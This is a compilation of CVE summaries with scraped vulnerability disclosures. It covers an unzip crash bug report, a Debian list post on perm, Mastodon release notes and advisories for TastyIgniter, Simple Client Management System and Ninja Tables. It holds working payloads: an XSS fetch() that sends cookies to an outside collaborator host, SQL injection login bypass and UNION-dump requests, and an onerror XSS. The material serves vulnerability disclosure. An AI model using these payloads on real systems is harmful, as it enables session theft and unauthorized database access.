A flaw was found in unzip 6.0. The vulnerability occurs during the conversion of an utf-8 string to a local string that leads to a segmentation fault. This flaw allows an attacker to input a specially crafted zip file, leading to a crash or code execution.

Comment 1 Sandipan Roy 2022-02-07 08:00:26 UTC

Created unzip tracking bugs for this issue:

Affects: fedora-all \[bug 2051397\]

Comment 6 Salvatore Bonaccorso 2022-02-12 10:10:22 UTC

Hi,

The referenced bug is not accessible, can you share details on this CVE?

Regards,
Salvatore

Comment 7 Sandipan Roy 2022-02-14 09:54:43 UTC

Hey Nils,

Can you add your flaw and POC files to this bug as public?

Thanks.

Comment 8 Nils Bars 2022-02-14 09:59:12 UTC

Created attachment 1860944 \[details\]
Reproduction scripts and bug triggering input.

SIGSEGV during the conversion of an utf-8 string to a local string

# Description
During extraction of the attached zip archive via
\`\`\`
unzip $PWD/testcase
\`\`\`
a nullpointer dereference is triggered and causes a segmentation fault (SIGSEGV).
The bug appears to be located in the code responsible for handling the conversion
of an utf-8 string to a local string.
A possible fix would be to check in the function \`utf8\_to\_local\_string\` whether the
call to \`utf8\_to\_wide\_string\` returns NULL and to handle the situation accordingly.

This bug allows an attacker to perform a denial of service and possibly opens up
other attack vectors.

To reproduce the crash, we provide scripts alongside the crashing input:
- ./reproduce-fedora.sh: Reproduce crash via a Fedora 35 docker container
- ./reproduce-ubuntu.sh: Reproduce crash via a Ubuntu 20.04 docker container

If you need further details, we are happy to assist where possible.

# yum info unzip
Last metadata expiration check: 0:04:07 ago on Mon Jan 31 12:39:57 2022.
Installed Packages
Name         : unzip
Version      : 6.0
Release      : 53.fc35
Architecture : x86\_64
Size         : 385 k
Source       : unzip-6.0-53.fc35.src.rpm
Repository   : @System
From repo    : fedora
Summary      : A utility for unpacking zip files
URL          : http://www.info-zip.org/UnZip.html
License      : BSD
Description  : The unzip utility is used to list, test, or extract files from a zip
             : archive.  Zip archives are commonly found on MS-DOS systems.  The zip
             : utility, included in the zip package, creates zip archives.  Zip and
             : unzip are both compatible with archives created by PKWARE(R)'s PKZIP
             : for MS-DOS, but the programs' options and default behaviors do differ
             : in some respects.
             : 
             : Install the unzip package if you need to list, test or extract files from
             : a zip archive.

# valgrind fedora
\[+\] Running unzip /testcase
==1== Memcheck, a memory error detector
==1== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==1== Using Valgrind-3.18.1 and LibVEX; rerun with -h for copyright info
==1== Command: unzip /testcase
==1== 
Archive:  /testcase
warning \[/testcase\]:  16 extra bytes at beginning or within zipfile
  (attempting to process anyway)
error \[/testcase\]:  reported length of central directory is
  -16 bytes too long (Atari STZip zipfile?  J.H.Holm ZIPSPLIT 1.1
  zipfile?).  Compensating...
==1== Invalid read of size 8
==1==    at 0x10CB55: UnknownInlinedFun (process.c:2503)
==1==    by 0x10CB55: UnknownInlinedFun (process.c:2600)
==1==    by 0x10CB55: do\_string.part.0.cold (fileio.c:2361)
==1==    by 0x118650: UnknownInlinedFun (fileio.c:2041)
==1==    by 0x118650: extract\_or\_test\_entrylist (extract.c:1377)
==1==    by 0x11A1F1: extract\_or\_test\_files (extract.c:742)
==1==    by 0x1253D6: do\_seekable.lto\_priv.0 (process.c:994)
==1==    by 0x10E51E: UnknownInlinedFun (process.c:401)
==1==    by 0x10E51E: UnknownInlinedFun (unzip.c:1279)
==1==    by 0x10E51E: main (unzip.c:742)
==1==  Address 0x0 is not stack'd, malloc'd or (recently) free'd
==1== 
error:  zipfile probably corrupt (segmentation violation)
==1== 
==1== HEAP SUMMARY:
==1==     in use at exit: 80,290 bytes in 8 blocks
==1==   total heap usage: 22 allocs, 14 frees, 86,257 bytes allocated
==1== 
==1== LEAK SUMMARY:
==1==    definitely lost: 0 bytes in 0 blocks
==1==    indirectly lost: 0 bytes in 0 blocks
==1==      possibly lost: 0 bytes in 0 blocks
==1==    still reachable: 80,290 bytes in 8 blocks
==1==         suppressed: 0 bytes in 0 blocks
==1== Rerun with --leak-check=full to see details of leaked memory
==1== 
==1== For lists of detected and suppressed errors, rerun with: -s
==1== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
\[+\] Dropping into shell. Malformed input is located at /testcase


# apt-show unzip
Package: unzip
Version: 6.0-25ubuntu1
Priority: optional
Section: utils
Origin: Ubuntu
Maintainer: Ubuntu Developers <ubuntu-devel-discuss@lists.ubuntu.com\>
Original-Maintainer: Santiago Vila <sanvila@debian.org\>
Bugs: https://bugs.launchpad.net/ubuntu/+filebug
Installed-Size: 593 kB
Depends: libbz2-1.0, libc6 (>= 2.14)
Suggests: zip
Homepage: http://www.info-zip.org/UnZip.html
Task: ubuntu-desktop-minimal, ubuntu-desktop, kubuntu-desktop, xubuntu-core, xubuntu-desktop, lubuntu-desktop, ubuntustudio-desktop-core, ubuntustudio-desktop, ubuntukylin-desktop, ubuntu-mate-core, ubuntu-mate-desktop, ubuntu-budgie-desktop
Download-Size: 169 kB
APT-Manual-Installed: yes
APT-Sources: http://archive.ubuntu.com/ubuntu focal/main amd64 Packages
Description: De-archiver for .zip files

# valgrind ubuntu
==1== Memcheck, a memory error detector
==1== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==1== Using Valgrind-3.15.0 and LibVEX; rerun with -h for copyright info
==1== Command: unzip /testcase
==1== 
Archive:  /testcase
warning \[/testcase\]:  16 extra bytes at beginning or within zipfile
  (attempting to process anyway)
error \[/testcase\]:  reported length of central directory is
  -16 bytes too long (Atari STZip zipfile?  J.H.Holm ZIPSPLIT 1.1
  zipfile?).  Compensating...
==1== Invalid read of size 8
==1==    at 0x11E5CD: wide\_to\_local\_string (process.c:2511)
==1==    by 0x11E800: utf8\_to\_local\_string (process.c:2608)
==1==    by 0x117D50: do\_string (fileio.c:2362)
==1==    by 0x111EE8: extract\_or\_test\_entrylist (extract.c:1376)
==1==    by 0x114E16: extract\_or\_test\_files (extract.c:741)
==1==    by 0x11C830: do\_seekable (process.c:994)
==1==    by 0x11D796: process\_zipfiles (process.c:401)
==1==    by 0x10EB36: unzip (unzip.c:1278)
==1==    by 0x48890B2: (below main) (libc-start.c:308)
==1==  Address 0x0 is not stack'd, malloc'd or (recently) free'd
==1== 
error:  zipfile probably corrupt (segmentation violation)
==1== 
==1== HEAP SUMMARY:
==1==     in use at exit: 80,290 bytes in 8 blocks
==1==   total heap usage: 22 allocs, 14 frees, 86,257 bytes allocated
==1== 
==1== LEAK SUMMARY:
==1==    definitely lost: 0 bytes in 0 blocks
==1==    indirectly lost: 0 bytes in 0 blocks
==1==      possibly lost: 0 bytes in 0 blocks
==1==    still reachable: 80,290 bytes in 8 blocks
==1==         suppressed: 0 bytes in 0 blocks
==1== Rerun with --leak-check=full to see details of leaked memory
==1== 
==1== For lists of detected and suppressed errors, rerun with: -s
==1== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
\[+\] Dropping into shell. Malformed input is located at /testcase

CVE-2022-0530: SIGSEGV during the conversion of an utf-8 string to a local string

A flaw was found in unzip 6.0. The vulnerability occurs during the conversion of wide string to local string that leads to a heap of out-of-bound writes. This flaw allows an attacker to input a specially crafted zip file, leading to a crash or code execution.

CVE-2022-0529: Heap out-of-bound writes and reads during conversion of wide string to local string

A Cross-Site Scripting (XSS) vulnerability exists within the 3.2.2 version of TastyIgniter. The "items%5B0%5D%5Bpath%5D" parameter of a request made to /admin/allergens/edit/1 is vulnerable.

**CVE-2022-23378 : Reflected XSS in TastyIgniter v3.2.2 Restaurtant CMS**

Authenticated reflected XSS exists in the TastyIgniter Admin dashboard in version v3.2.2.

Mitre URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23378

**Proof of Concept (POC):****Admin Dashboard Allergens:**

**Affected URL:** `/admin/allergens/edit/1?items%5B0%5D%5Bpath%5D=%2fdoesnotexist%3cscript%3efetch('https%3a%2f%2fvgfx3ortri1x8mjfw16ngmpq2h8awz.burpcollaborator.net'%2c%7bmethod%3a%20'POST'%2cmode%3a%20'no-cors'%2cbody%3adocument.cookie%7d)%3b%3c%2fscript%3e%20`

**Source code file affected:** `./vendor/league/flysystem/src/FileNotFoundException.php`

When updating an allergen within the administrator dashboard, an option to attach an image to the allergen is available. When attached, a POST request with parameters pertaining to data about the image is submitted. The parameter `items%5B0%5D%5Bpath%5D` is vulnerable to JavaScript injection, resulting in a potential vector for Cross-Site Scripting (XSS). When including the XSS payload, the server responds with an error message containing and executing the XSS payload.

Original POST request with XSS payload:

POST /admin/allergens/edit/1 HTTP/1.1
Host: <REDACTED>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: \*/\*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-IGNITER-REQUEST-HANDLER: formThumb::onAddAttachment
X-CSRF-TOKEN: Y----8<----C8n
X-Requested-With: XMLHttpRequest
Origin: http://<REDACTED>
Connection: close
Cookie: tastyigniter\_session=ey----8<----n0%3D; admin\_auth=ey----8<----0%3D; ti\_activeFormSaveAction=%22close%22
Cache-Control: no-transform

items%5B0%5D%5Bname%5D=image.jpeg&items%5B0%5D%5Bpath%5D=%2fdoesnotexist%3cscript%3efetch('https%3a%2f%2fvgfx3ortri1x8mjfw16ngmpq2h8awz.burpcollaborator.net'%2c%7bmethod%3a%20'POST'%2cmode%3a%20'no-cors'%2cbody%3adocument.cookie%7d)%3b%3c%2fscript%3e%20&items%5B0%5D%5Bsize%5D=192&items%5B0%5D%5BlastModified%5D=1642193919&items%5B0%5D%5Btype%5D=file&items%5B0%5D%5BpublicUrl%5D=http%3A%2F%2F<REDACTED>%2Fassets%2Fmedia%2Fuploads%2Fimage.jpeg

![01_Original_POST](https://raw.githubusercontent.com/TheGetch/CVE-2022-23378/main/01_Original_POST.png)

Server Response:

HTTP/1.1 500 Internal Server Error
Date: Fri, 14 Jan 2022 21:21:27 GMT
Server: Apache/2.4.38 (Debian)
Cache-Control: no-cache, private
Set-Cookie: tastyigniter\_session=e----8<\----In0%3D; expires\=Fri, 14-Jan-2022 23:21:27 GMT; Max-Age\=7200; path\=/; httponly; samesite\=lax
Content-Length: 183
Connection: close
Content-Type: text/html; charset=UTF-8

File not found at path: uploads/doesnotexist<script\>fetch('https:/vgfx3ortri1x8mjfw16ngmpq2h8awz.burpcollaborator.net',{method: 'POST',mode: 'no-cors',body:document.cookie});</script\>

Furthermore, the request can be changed to a GET request with the affected parameter included within the URL, further increasing the likelihood of success for an adversary to exploit on a phished victim.

Modified GET request:

GET /admin/allergens/edit/1?items%5B0%5D%5Bpath%5D=%2fdoesnotexist%3cscript%3efetch('https%3a%2f%2fvgfx3ortri1x8mjfw16ngmpq2h8awz.burpcollaborator.net'%2c%7bmethod%3a%20'POST'%2cmode%3a%20'no-cors'%2cbody%3adocument.cookie%7d)%3b%3c%2fscript%3e%20 HTTP/1.1
Host: <REDACTED>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: \*/\*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-IGNITER-REQUEST-HANDLER: formThumb::onAddAttachment
X-CSRF-TOKEN: Y----8<----C8n
X-Requested-With: XMLHttpRequest
Origin: http://<REDACTED>
Connection: close
Cookie: tastyigniter\_session=ey----8<----n0%3D; admin\_auth=ey----8<----0%3D; ti\_activeFormSaveAction=%22close%22
Cache-Control: no-transform

![02_Modified_GET](https://raw.githubusercontent.com/TheGetch/CVE-2022-23378/main/02_Modified_GET.png)

Response remains the same:

HTTP/1.1 500 Internal Server Error
Date: Fri, 14 Jan 2022 21:21:27 GMT
Server: Apache/2.4.38 (Debian)
Cache-Control: no-cache, private
Set-Cookie: tastyigniter\_session=eyJpdiI6Ik16bUtDZUV6eEw3RzByeG1LTWNBdUE9PSIsInZhbHVlIjoiQUgrTkJ1b2tmMzlFenVDVFlZZ1FHa0d5eVVITUFvT0t0YS9vcklNaHRKMnJYQjYwUyt5S3EySVpLWkpCSzR0YkhTS283VHV4d21KRjhCeHBZQ2NXbGlVRFVBcm9jR1dZbVlsdGZEdzFGZzQwQ2VjVjN1VkZ6ZWh2NmRGZis5dFEiLCJtYWMiOiI3YWQ4ZTM0NzBkZWIyZTNmNmE2OWM3NmJkMWJkYzgwNWYzYzRkNjQ2NjY5OGU2NzhkNjY5YTRlMWNmOTFiMjY0IiwidGFnIjoiIn0%3D; expires=Fri, 14-Jan-2022 23:21:27 GMT; Max-Age=7200; path=/; httponly; samesite=lax
Content-Length: 183
Connection: close
Content-Type: text/html; charset=UTF-8

File not found at path: uploads/doesnotexist<script\>fetch('https:/vgfx3ortri1x8mjfw16ngmpq2h8awz.burpcollaborator.net',{method: 'POST',mode: 'no-cors',body:document.cookie});</script\>

![03_Server_Response](https://raw.githubusercontent.com/TheGetch/CVE-2022-23378/main/03_Server_Response.png)

**Collaborator Interaction:**

![04_Collaborator_Hit](https://raw.githubusercontent.com/TheGetch/CVE-2022-23378/main/04_Collaborator_Hit.png)

![05_Collaborator_Interaction](https://raw.githubusercontent.com/TheGetch/CVE-2022-23378/main/05_Collaborator_Interaction.png)

**Discovery**

January 2022

*   Eric Getchell - TheGetch

CVE-2022-23378: GitHub - TheGetch/CVE-2022-23378

perM 0.4.0 has a Buffer Overflow related to strncpy. (Debian initially fixed this in 0.4.0-7.)

*   _To_: debian-med@lists.debian.org
*   _Subject_: Re: Autopkgtest for perm
*   _From_: Nilesh Patra <nilesh@tchncs.de\>
*   _Date_: Mon, 2 Aug 2021 18:44:55 +0530
*   _Message-id_: <\[🔎\] 89b79cf7-8163-5986-8746-4ba065cafdca@tchncs.de\>
*   _In-reply-to_: <\[🔎\] 20210802130013.GX25911@an3as.eu\>
*   _References_: <\[🔎\] CAJFurRRrERrOccMGHRm2ghj=6fmu5AD3Nm8HXRfeYRpO4bhG5g@mail.gmail.com\> <\[🔎\] 20210802130013.GX25911@an3as.eu\>

On 8/2/21 6:30 PM, Andreas Tille wrote:
> Hi Shruti,
> 
> On Mon, Aug 02, 2021 at 04:50:36PM +0530, Shruti Sridhar wrote:
>> I have written autopkgtests for perm\[1\]
>>
>> The package initially failed blhc in the pipeline but when I fixed the
>> error \[2\]

Congratulations, you found a security issue as it seems.
I'm happy that enabling blhc is doing a sensible job

>> the autopkgtest which was initially working fails \[3\].
> 
> The autopkgtest says:
> 
> Info 3: Sortubg buckets using 2 CPUs                                          .
> \*\*\* buffer overflow detected \*\*\*: terminated
> Info 3: Successfully made the index
> 
> My guess is that enabling hardening options has uncovered some memory leak.
> I'd recommend firing up gdb and try finding the issue.

The basic problem is that it has several instances of strcpy and sprintf, which are
famously known for causing buffer overflows.

I think the sensible option is to replace these with strlcpy and strcat when needed.

But the problem is that the code needs a lot of refactoring, rewriting and debugging to get these things in properly.
So I am tempted to say that we should consider to remove perm from the archive.
Upstream is dead, and I do not think it is worth keeping this in anymore

What do you think?

Nilesh

**Attachment: OpenPGP\_signature**  
_Description:_ OpenPGP digital signature

**Reply to:**

*   debian-med@lists.debian.org
*   Nilesh Patra (on-list)
*   Nilesh Patra (off-list)

*   **Follow-Ups**:
    *   **Re: Autopkgtest for perm**
        *   _From:_ Nilesh Patra <nilesh@tchncs.de>

*   **References**:
    *   **Autopkgtest for perm**
        *   _From:_ Shruti Sridhar <shruti.sridhar99@gmail.com>
    *   **Re: Autopkgtest for perm**
        *   _From:_ Andreas Tille <andreas@an3as.eu>

*   Prev by Date: **Re: Autopkgtest for perm**
*   Next by Date: **Re: Autopkgtest for perm**
*   Previous by thread: **Re: Autopkgtest for perm**
*   Next by thread: **Re: Autopkgtest for perm**
*   Index(es):
    *   **Date**
    *   **Thread**

CVE-2021-38172: Re: Autopkgtest for perm

The config restore function of Voipmonitor GUI before v24.96 does not properly check files sent as restore archives, allowing remote attackers to execute arbitrary commands via a crafted file in the web root.

CVE-2022-24262: News - VoIPmonitor

Mastodon before 3.3.2 and 3.4.x before 3.4.6 has incorrect access control because it does not compact incoming signed JSON-LD activities. (JSON-LD signing has been supported since version 1.6.0.)

![Mastodon](https://camo.githubusercontent.com/151e1927aa71042bef4528c6e8a848b83ecda374a27297111d42f69d5a1f649d/68747470733a2f2f692e696d6775722e636f6d2f4e685a6334306c2e706e67)

> ⚠️ This release is an important security release fixing CVE-2022-24307, **a critical security issue**.
> 
> A corresponding security release is also available for the 3.4.x branch, which is the recommended release.

**Changelog****Fixed**

*   Fix `mastodon:webpush:generate_vapid_key` task requiring a functional environment (ClearlyClaire)
*   Fix spurious errors when receiving an Add activity for a private post (ClearlyClaire)

**Security**

*   Fix error-prone SQL queries (ClearlyClaire)
*   Fix not compacting incoming signed JSON-LD activities (puckipedia, ClearlyClaire) (CVE-2022-24307)
*   Fix insufficient sanitization of report comments (ClearlyClaire)
*   Fix stop condition of a Common Table Expression (ClearlyClaire)
*   Disable legacy XSS filtering (Wonderfall)

**Upgrade notes**

Because this is a backport, it is not available with `git pull`. Use `git fetch && git checkout v3.3.2`

> As always, **make sure you have backups of the database before performing any upgrades**. If you are using docker-compose, this is how a backup command might look: docker exec mastodon\_db\_1 pg\_dump -Fc -U postgres postgres > name\_of\_the\_backup.dump

**Dependencies**

External dependencies have not changed compared to v3.3.1, the compatible Ruby, PostgreSQL, Node, Elasticsearch and Redis versions are the same, that is:

*   Ruby: 2.5 to 2.7
*   PostgreSQL: 9.4 or newer
*   Elasticsearch (optional, for full-text search): 5.x, 6.x or 7.x
*   Redis: 4 or newer
*   Node:
    *   Node 10: 10.0 or newer
    *   Node 12: 12.16 or newer
    *   Node 13: 13.9 or newer
    *   Node 14: 14.5 or newer

Compared to 3.3.0, an additional system dependency is required: `shared-mime-info`, which is likely already installed on your system.  
On Debian-based systems, it can be installed using `apt install shared-mime-info`.

**Update steps**

The following instructions are for updating from 3.3.2.

If you are upgrading directly from an earlier release, please carefully read the upgrade notes for the skipped releases as well, as they often require extra steps such as database migrations.

**Non-Docker**

If you're upgrading from before 3.3.2, make sure you have `shared-mime-info` installed (`apt install shared-mime-info`).

1.  Pull the code: `git fetch && git checkout v3.3.2`
2.  Restart `mastodon-web` and `mastodon-sidekiq`:  
    `systemctl reload mastodon-web`  
    `systemctl restart mastodon-sidekiq`

**Docker**

The exact steps depend on your setup, but they are likely to match the following:

1.  Pull the code: `git fetch && git checkout v3.3.2`
2.  Pull the prebuilt images: `docker-compose pull`, or, alternatively, build them yourself: `docker-compose build --pull`
3.  Restart all Mastodon processes: `docker-compose up -d`

CVE-2022-24307: Release v3.3.2 · mastodon/mastodon

SQL Injection vulnerability exists in Sourcecodester Simple Client Management System 1.0 via the username field in login.php.

Permalink

Cannot retrieve contributors at this time

\# Exploit Title: Simple Client Management System 1.0 - SQL injection (Authentication Bypass)

\# Date: 27/01/2022

\# Exploit Author: Rahul Kalnarayan (r4hn1)

\# Vendor Homepage: https://www.sourcecodester.com/

\# Software Link: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html

\# Version: 1.0

\# Category: Webapps

\# Tested on: Apache2+MariaDB latest version

\# Description : Simple Client Management System 1.0 suffers from SQL injection vulnerability, allowing an un-authenticated user to login admin panel.

\# CVE ID: CVE-2021-43510

Vulnerable Page: /crm/admin/

POC-Request

\-----------------------------------

POST /cms/classes/Login.php?f=login HTTP/1.1

Host: 192.168.1.76

Content-Length: 31

Accept: \*/\*

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Origin: http://192.168.1.76

Referer: http://192.168.1.76/cms/admin/login.php

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Connection: close

username=admin'+or+'1'%3d'1'--+-&password=as

\---------------------------------------

POC-Response

HTTP/1.1 200 OK

Date: Thu, 27 Jan 2022 17:29:08 GMT

Server: Apache/2.4.38 (Debian)

Set-Cookie: PHPSESSID=1s27q3saavhi3jc8lndng66tlt; path=/; secure

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Content-Length: 20

Connection: close

Content-Type: text/html; charset=UTF-8

{"status":"success"}

CVE-2021-43510: Simple-Client-Management-System-Exploit/CVE-2021-43510 at main · r4hn1/Simple-Client-Management-System-Exploit

SQL Injection vulnerability exists in Sourcecodester Simple Client Management System 1.0 via the id parameter in view-service.php.

Permalink

Cannot retrieve contributors at this time

\# Exploit Title: Simple Client Management System 1.0 - Unauthenticated SQL injection (view\_service.php)

\# Date: 27/01/2022

\# Exploit Author: Rahul Kalnarayan (r4hn1)

\# Vendor Homepage: https://www.sourcecodester.com/

\# Software Link: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html

\# Version: 1.0

\# Category: Webapps

\# Tested on: Apache2+MariaDB latest version

\# Description : Simple Client Management System 1.0 suffers from SQL injection vulnerability, allowing an un-authenticated user to dump databse.

Vulnerable Page: /cms/admin/maintenance/view\_service.php

POC-Request

\-----------------------------------

GET /cms/admin/maintenance/view\_service.php?id=9999%27%20union%20all%20select%20null,null,concat(database()),null,null,null,null--+ HTTP/1.1

Host: 192.168.1.76

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Connection: close

\---------------------------------------

POC-Response

HTTP/1.1 200 OK

Date: Thu, 27 Jan 2022 17:34:55 GMT

Server: Apache/2.4.38 (Debian)

Set-Cookie: PHPSESSID=radrun69h6fsn08bd53b8spsvq; path=/; secure

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Vary: Accept-Encoding

Content-Length: 1469

Connection: close

Content-Type: text/html; charset=UTF-8

<style>

#uni\_modal .modal-footer{

display:none;

}

</style>

<div class="container-fluid" id="print\_out">

<div id='transaction-printable-details' class='position-relative'>

<div class="row">

<fieldset class="w-100">

<div class="col-12">

<dl>

<dt class="text-info">Name:</dt>

<dd class="pl-3"></dd>

<dt class="text-info">Description:</dt>

<dd class="pl-3">cms\_db</dd>

<dt class="text-info">Price:</dt>

<dd class="pl-3"></dd>

<dt class="text-info">Status:</dt>

<dd class="pl-3">

<span class="badge badge-danger rounded-pill">Inactive</span>

</dd>

</dl>

</div>

</fieldset>

</div>

</div>

</div>

<div class="form-group">

<div class="col-12">

<div class="d-flex justify-content-end align-items-center">

<button class="btn btn-dark btn-flat" type="button" id="cancel" data-dismiss="modal">Close</button>

</div>

</div>

</div>

<script>

$(function(){

$('.table td,.table th').addClass('py-1 px-2 align-middle')

})

</script>

CVE-2021-43509: Simple-Client-Management-System-Exploit/CVE-2021-43509 at main · r4hn1/Simple-Client-Management-System-Exploit

The Ninja Tables WordPress plugin before 4.1.8 does not sanitise and escape some of its table fields, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed

**WordPress Ninja Tables 4.1.7 Cross Site Scripting**

Posted Oct 25, 2021

Authored by Akash Rajendra Patil

WordPress Ninja Tables plugin version 4.1.7 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss

MD5 | `1ee321f04776c466b3590854bba610c6`

Download | Favorite | View

**WordPress Ninja Tables 4.1.7 Cross Site Scripting**

    # Exploit Title: WordPress Plugin Ninja Tables 4.1.7 - Stored Cross-Site Scripting (XSS)# Date: 25-10-2021# Exploit Author: Akash Rajendra Patil# Vendor Homepage: https://wordpress.org/plugins/ninja-tables/# Software Link: https://wpmanageninja.com/downloads/ninja-tables-pro-add-on/# Version: 4.1.7# Tested on Windows*How to reproduce vulnerability:*1. Install Latest WordPress2. Install and activate Ninja Tables <= 4.1.73. Enter JavaScript payload which is mentioned below"><img src=x onerror=confirm(docment.domain)> in the 'Coulmn Name & Add Data'and enter the data into the user input field.Then Navigate to Table Design5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality in that time JavaScript payload is executing successfully and we are getting a pop-up.

**File Tags**

*   ActiveX (932)
*   Advisory (76,655)
*   Arbitrary (14,946)
*   BBS (2,859)
*   Bypass (1,518)
*   CGI (1,009)
*   Code Execution (6,477)
*   Conference (667)
*   Cracker (797)
*   CSRF (3,247)
*   DoS (21,554)
*   Encryption (2,320)
*   Exploit (49,159)
*   File Inclusion (4,121)
*   File Upload (933)
*   Firewall (821)
*   Info Disclosure (2,531)
*   Intrusion Detection (845)
*   Java (2,745)
*   JavaScript (789)
*   Kernel (5,904)
*   Local (13,904)
*   Magazine (586)
*   Overflow (12,045)
*   Perl (1,409)
*   PHP (5,024)
*   Proof of Concept (2,273)
*   Protocol (3,233)
*   Python (1,365)
*   Remote (29,340)
*   Root (3,428)
*   Ruby (564)
*   Scanner (1,628)
*   Security Tool (7,635)
*   Shell (3,014)
*   Shellcode (1,192)
*   Sniffer (877)
*   Spoof (2,064)
*   SQL Injection (15,868)
*   TCP (2,345)
*   Trojan (666)
*   UDP (865)
*   Virus (657)
*   Vulnerability (30,162)
*   Web (8,870)
*   Whitepaper (3,701)
*   x86 (939)
*   XSS (17,211)
*   Other

**File Archives**

*   January 2022
*   December 2021
*   November 2021
*   October 2021
*   September 2021
*   August 2021
*   July 2021
*   June 2021
*   May 2021
*   April 2021
*   March 2021
*   February 2021
*   Older

**Systems**

*   AIX (423)
*   Apple (1,860)
*   BSD (368)
*   CentOS (55)
*   Cisco (1,909)
*   Debian (5,947)
*   Fedora (1,690)
*   FreeBSD (1,241)
*   Gentoo (4,150)
*   HPUX (875)
*   iOS (311)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (41,376)
*   Mac OS X (682)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (476)
*   RedHat (10,982)
*   Slackware (941)
*   Solaris (1,601)
*   SUSE (1,444)
*   Ubuntu (7,593)
*   UNIX (9,015)
*   UnixWare (182)
*   Windows (6,265)
*   Other

CVE-2021-24900: WordPress Ninja Tables 4.1.7 Cross Site Scripting ≈ Packet Storm

xterm through Patch 370, when Sixel support is enabled, allows attackers to trigger a buffer overflow in set_sixel in graphics_sixel.c via crafted text.

Tag

#debian